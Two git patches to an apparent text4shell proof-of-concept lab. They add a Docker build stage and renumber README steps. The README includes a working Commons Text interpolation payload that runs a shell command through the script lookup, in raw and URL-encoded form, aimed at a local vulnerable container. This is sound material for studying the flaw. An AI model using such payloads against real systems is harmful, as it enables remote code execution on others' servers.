From 74d0319884265b8b972ef2616228432dd8e889f2 Mon Sep 17 00:00:00 2001
From: Jan Hartje <jan.hartje@enercity-netz.de>
Date: Mon, 14 Nov 2022 18:09:00 +0100
Subject: [PATCH 1/2] feat: streamline testing process by including build step
 in docker

---
 Dockerfile | 10 ++++++++--
 README.md  | 28 +++++++++++-----------------
 2 files changed, 19 insertions(+), 19 deletions(-)

diff --git a/Dockerfile b/Dockerfile
index a31999b..44d4987 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,3 +1,9 @@
+# Build the jar File
+FROM maven:latest as build
+WORKDIR /app
+COPY . /app
+RUN mvn clean install
+
 # Use an official OpenJDK runtime as a parent image
 FROM openjdk:8-jre-alpine
 
@@ -9,10 +15,10 @@ RUN apk update && apk add bash
 WORKDIR /app
 
 # Copy the fat jar into the container at /app
-COPY /target/text4shell-poc.jar /app
+COPY --from=build /app/target/text4shell-poc.jar /app
 
 # Make port 8080 available to the world outside this container
 EXPOSE 8080
 
 # Run jar file when the container launches
-CMD ["java", "-jar", "text4shell-poc.jar"]
\ No newline at end of file
+CMD ["java", "-jar", "text4shell-poc.jar"]
diff --git a/README.md b/README.md
index 2452d91..7e43d0f 100644
--- a/README.md
+++ b/README.md
@@ -1,32 +1,26 @@
 ### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu)
--------------
 
+---
 
-1. Maven install to create the fat jar
-
-```
-mvn clean install
-```
-
-2. Docker build
+1. Docker build
 
 ```
 docker build --tag=text4shell .
 ```
 
-3. Docker run
+2. Docker run
 
 ```
 docker run -p 80:8080 text4shell
 ```
 
-4. Test the app
+3. Test the app
 
 ```
 http://localhost/text4shell/attack?search=<anything>
 ```
 
-5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
+4. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
 
 ```
 ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
@@ -34,28 +28,28 @@ ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
 
 http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
 
-6. You can also try using `dns` or `url` prefixes.
+5. You can also try using `dns` or `url` prefixes.
 
-7. Get the container id
+6. Get the container id
 
 ```
 docker container ls
 ```
 
-8. Get into the app
+7. Get into the app
 
 ```
 docker exec -it <container_id> bash
 ```
 
-9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
+8. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
 
 ```
 ls /tmp/
 ```
 
-10. To stop the container
+9. To stop the container
 
 ```
 docker container stop <container_id>
-```
\ No newline at end of file
+```

From 8b6e3e873884c7ffd6c28b2e653127ae40a8f75d Mon Sep 17 00:00:00 2001
From: Jan Hartje <jan.hartje@enercity-netz.de>
Date: Mon, 14 Nov 2022 18:12:36 +0100
Subject: [PATCH 2/2] fix: remove latest tag from maven

---
 Dockerfile | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Dockerfile b/Dockerfile
index 44d4987..7ed5626 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,5 +1,5 @@
 # Build the jar File
-FROM maven:latest as build
+FROM maven:3.8.6-eclipse-temurin-8-alpine as build
 WORKDIR /app
 COPY . /app
 RUN mvn clean install